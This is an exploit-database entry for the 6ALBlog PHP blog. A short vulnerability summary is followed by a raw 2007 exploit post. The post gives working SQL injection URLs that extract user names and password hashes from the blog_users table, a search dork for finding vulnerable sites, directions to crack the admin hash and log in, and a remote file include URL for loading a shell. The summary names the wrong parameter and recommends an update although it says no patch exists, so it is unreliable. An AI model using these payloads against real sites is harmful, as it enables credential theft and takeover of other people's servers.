6ALBlog All Versions Remote SQL Injection and Remote File Include Vulnerability

vendor:

6ALBlog

by:

Crackers_Child

7.5

CVSS

HIGH

Remote SQL Injection and Remote File Include

CWE

Product Name: 6ALBlog

Affected Version From: All versions

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

6ALBlog All Versions Remote SQL Injection and Remote File Include Vulnerability

The vulnerability allows remote attackers to execute arbitrary SQL commands and include arbitrary files via the member parameter in the comments page.

Mitigation:

Update to the latest version of the 6ALBlog software and sanitize user input in the member parameter.

Source

Exploit-DB raw data:

+______________________________________________By Crackers_Child___________________________________________+

*
*
*    [~] Portal.......:        6ALBlog All Versions
*    [~] Download.....:    http://down.otand.com/download/code/php/blog/6alblog.rar
*    [~] Author.......:       Crackers_Child  | cybermilitan@hotmail.com & localexploit@hotmail.com
*    [~] Class........:       Remote SQL Injection and Remote File Ä°nclude Vulnerability
*    [~] Dork.........:        inurl:"member.php?page=comments
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*       [~] Exploit Sql...:                    http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,user,3,4,5,6,7%20from%20blog_users/*
*                               http://[Taget]/[Path]/member.php?page=comments&member=MEMBERNAME&newsid=-1%20union%20select%200,1,pass,3,4,5,6,7%20from%20blog_users/*
*
*
*       [~] Exploit Rfi...:     After Cracked md5 admin you must login site.com/admin/  than our rfi can  work
*
*                               http://[Taget]/[Path]/admin/index.php?pg=Sh3ll?
+_______________________________________________________________________________________________________________________+



        [~] Ä°nfo......:Brothas You must change MemberName on exploit , when you look index.php you will see members and you can choose anyone
                       and you can write it on exploit "MEMBERNAME" area ;)



+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*       [~] Sp Tnx.......:    str0ke, BiyoSecurity.Net, TurkProtest, Tryag.com/cc/(Mahmood_ali),Dj7xpl,Dosyacek.com And All Friends
*
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-06-25]